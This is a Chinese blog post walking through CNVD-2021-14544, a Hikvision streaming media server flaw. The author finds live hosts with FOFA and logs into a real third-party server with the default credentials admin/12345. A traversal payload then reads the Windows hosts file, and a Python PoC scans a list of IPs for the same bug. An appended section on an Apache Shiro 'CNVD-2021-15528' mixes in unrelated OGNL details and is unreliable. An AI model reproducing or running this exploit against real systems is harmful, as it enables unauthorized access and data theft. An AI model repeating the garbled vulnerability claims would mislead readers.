CNVD-2021-14544 漏洞复现

本文详细介绍了海康威视流媒体管理服务器存在的弱口令和任意文件读取漏洞,影响版本为V2.3.5。作者通过fofa搜索引擎找到目标,利用默认弱口令admin/12345登录,并展示了如何使用Burpsuite进行任意文件读取,成功下载了系统中的hosts文件。同时,提供了Python PoC代码供读者参考,强调了持续的安全测试和防护的重要性。

大四的生活忙忙碌碌,在绿盟实习和忙毕设,让我划水A了半年,今天写一下最近申请零组文库邀请码,提交的复现文章叭.
贵有恒何必三更眠五更起,最无益只怕一日曝十日寒
话不多说,快上车。

海康威视流媒体管理服务器任意文件读取(CNVD-2021-14544)

1.漏洞说明
海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。
杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞和任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。
2.影响版本
杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5
3.漏洞复现
又是熟悉的面向搜索引擎测试
打开fofa搜索引擎:https://fofa.so/
Fofa搜索标题:title="流媒体管理服务器"
在这里插入图片描述
这个漏洞的突破点在于弱口令,默认的口令为admin/12345
登录到管理界面之后才能利用该漏洞进行任意文件读取.
首先打开fofa搜到的结果网站
在这里插入图片描述
通过弱口令admin/12345登录系统,这里猴子君试了7,8个网站,运气不错,遇到一个弱口令,登录进了管理界面.
在这里插入图片描述
看了一下,没有什么数据内容,应该是荒废已久的服务器.
选择左侧菜单栏中的维护管理-日志下载
在这里插入图片描述
这里可以看到下载功能,那么我们使用Burpsuite,设置代理,打开数据包拦截(intercept is on),然后再点击网站的下载按钮
在这里插入图片描述
这里的任意文件读取是在 fileName= 的后面.
修改fileName字段进行任意文件读取
Payload:

/systemLog/downFile.php?fileName=…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts

点击BurpsuiteForward,发现Chrome浏览器自动将这个文件下载下来了
在这里插入图片描述
查看一下下载的文件
在这里插入图片描述
打开文件看一下内容
在这里插入图片描述
确实是读取到了
下面附上大佬的POC(python):

# coding=utf-8
# CNVD-2021-14544
# 海康威视流媒体管理服务器任意文件读取
# Fofa:title="流媒体管理服务器"

import requests
import time
import urllib3
urllib3.disable_warnings()

def title():
        print("+-------------------------------------------------+")
        print("+-----------    CNVD-2021-14544   ----------------+")
        print("+-------   海康威视流媒体管理服务器任意文件读取   -----+")
        print("+--------  use: python3 CNVD-2021-14544.py -------+")
        print("+--------        Author: Henry4E36         -------+")
        print("+-------------------------------------------------+")

def target_url(url,filename):
    target_url = url + f"/systemLog/downFile.php?fileName=../../../../../../../{filename}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
    }

    try:
        res = requests.get(url=target_url,headers=headers,verify=False, timeout=5)
        if res.status_code == 200 and "window.history.back(-1)" in res.text:
            print("[----------------------------------------------]")
            print(f"[0]  目标系统: {url} 不存在该文件{filename}")
        elif res.status_code == 200:
            # 这里存在极大的误差,小heny不知道怎么判断了,有大佬知道的话可以交流哈 ^_^
            print("[----------------------------------------------]")
            print(f"\033[31m[!]  目标系统: {url} 存在任意文件读取!")
            print(f"[!] 正在读取文件:{filename} 中.......\033[0m")
            time.sleep(1)
            print(f"[-] 文件内容为:\n {res.text}")
        else:
            print("[----------------------------------------------]")
            print("[0] 目标系统连接失败!")

    except Exception as e:
        print("[----------------------------------------------]")
        print("[0]  目标系统出现意外情况!\n",e)


if __name__ == "__main__":
    title()
    filename = str(input("[-] 请输入需要读取的文件:\n"))
    with open("ip.txt","r") as urls:
        for url in urls:
            if url[:4] != "http":
                url = "http://" +url
            url = url.strip()
            target_url(url,filename)
    urls.close()

参考文章:https://mp.weixin.qq.com/s/t1ERU-LuhaDanCylbscWZQ

### CNVD-2021-15528 漏洞详情 CNVD-2021-15528 是针对 Apache Shiro 的反序列化远程代码执行漏洞。此漏洞允许未经身份验证的攻击者发送特制请求来触发 Java 反序列化过程中的代码执行,从而完全控制目标服务器。 #### 影响范围 该漏洞主要影响使用了 Apache Shiro 进行会话管理的应用程序,特别是当应用程序启用了 RememberMe 功能时更为危险。具体受影响版本包括但不限于: - Apache Shiro 1.2.x 至 1.7.x 版本 #### FOFA 查询语句 为了帮助安全研究人员定位可能存在风险的服务实例,提供了如下 FOFA 查询条件: ```plaintext "title="Shiro Session Manager"" ``` #### 漏洞复现环境搭建 要重现这个漏洞,通常需要满足以下几个前提条件: - 应用程序开启了 RememberMe 功能; - 攻击者能够获取到有效的 rememberMe cookie 值; - 存在一个可被利用的对象图导航语言 (OGNL) 表达式注入点[^1]。 ### 安全公告 国家信息安全漏洞共享平台(CNVD)于 2021 年发布了有关此漏洞的通知,并强调其严重性和潜在危害。鉴于该漏洞可能带来的严重影响以及广泛的存在性,强烈建议所有相关方尽快采取行动以减轻风险。 ### 补丁与修复方法 对于存在此类安全隐患的产品和服务提供商而言,最直接有效的方式就是升级至不受影响的新版软件。Apache 官方已经意识到这个问题,在后续发布的版本中解决了这一缺陷。因此推荐的做法是: - 升级到最新的稳定发行版,如 Apache Shiro 1.8 或更高版本。 如果无法立即完成上述操作,则应考虑实施临时缓解措施,比如禁用 RememberMe 功能或将 OGNL 解析器设置为只读模式等策略。 另外,还可以通过配置 Web Application Firewall(WAF) 来阻止可疑流量进入系统内部网络区域,以此作为额外一层防护手段[^2]。 ```bash # 更新依赖库至最新版本 mvn install -U ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尐猴子君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值